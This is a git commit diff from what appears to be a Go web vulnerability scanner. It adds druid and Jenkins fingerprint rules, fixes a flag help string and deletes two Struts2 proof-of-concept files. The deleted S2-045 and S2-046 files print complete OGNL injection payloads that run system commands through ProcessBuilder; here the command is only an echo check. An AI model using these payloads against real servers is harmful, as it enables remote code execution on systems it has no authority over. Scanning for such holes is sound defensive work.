添加2个指纹

2021-03-25 15:36:21 +08:00 · 2021-03-25 15:36:21 +08:00 · d503f55693
parent e866d68f10
commit d503f55693
4 changed files with 3 additions and 29 deletions
--- a/WebScan/info/rules.go
+++ b/WebScan/info/rules.go
@ -122,6 +122,8 @@ var RuleDatas = []RuleData{
 	{"DWR", "code", "(dwr/engine.js)"},
 	{"swagger_ui", "code", "(swagger-ui/css|\"swagger\":|swagger-ui.min.js)"},
 	{"大汉版通发布系统", "code", "(大汉版通发布系统|大汉网络)"},
 	{"druid", "code", "(druid.index|DruidDrivers|DruidVersion|Druid Stat Index)"},
 	{"Jenkins", "code", "(Jenkins)"},
 }
 var Md5Datas = []Md5Data{
--- a/WebScan/pocs/struts2-045-3.yml
+++ b/WebScan/pocs/struts2-045-3.yml
@ -1,12 +0,0 @@
 name: poc-yaml-struts2_045-3
 rules:
  - method: GET
    path: /
    headers:
      Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('echo struts2_security_check'.toString().split('\\\\s'))).start().getInputStream()).useDelimiter('\\\\AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}"
    follow_redirects: true
    expression: |
      response.body.bcontains(b"struts2_security_check")
 detail:
  author: shadown1ng(https://github.com/shadown1ng)
--- a/WebScan/pocs/struts2-046-2.yml
+++ b/WebScan/pocs/struts2-046-2.yml
@ -1,16 +0,0 @@
 name: poc-yaml-struts2_046-2
 set:
  r1: b"-----------------------------\r\nContent-Disposition:\x20form-data;\x20name=\"test\";\x20filename=\"%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo\x20struts2_security_check').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00b\"\r\nContent-Type:\x20text/plain\r\n\r\n\r\n-----------------------------"
 rules:
  - method: POST
    path: /
    headers:
      Content-Type: multipart/form-data; boundary=---------------------------
    follow_redirects: true
    body: |
      {{r1}}
    expression: |
      response.body.bcontains(b"struts2_security_check")
 detail:
  author: shadown1ng(https://github.com/shadown1ng)
--- a/common/flag.go
+++ b/common/flag.go
@ -40,7 +40,7 @@ func Flag(Info *HostInfo) {
 	flag.BoolVar(&TmpSave, "no", false, "not to save output log")
 	flag.BoolVar(&LogErr, "debug", false, "debug mode will print more error info")
 	flag.StringVar(&URL, "u", "", "url")
-	flag.StringVar(&UrlFile, "uf", "", "url")
+	flag.StringVar(&UrlFile, "uf", "", "urlfile")
 	flag.StringVar(&Pocinfo.PocName, "pocname", "", "use the pocs these contain pocname, -pocname weblogic")
 	flag.StringVar(&Pocinfo.Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
 	flag.StringVar(&Pocinfo.Cookie, "cookie", "", "set poc cookie")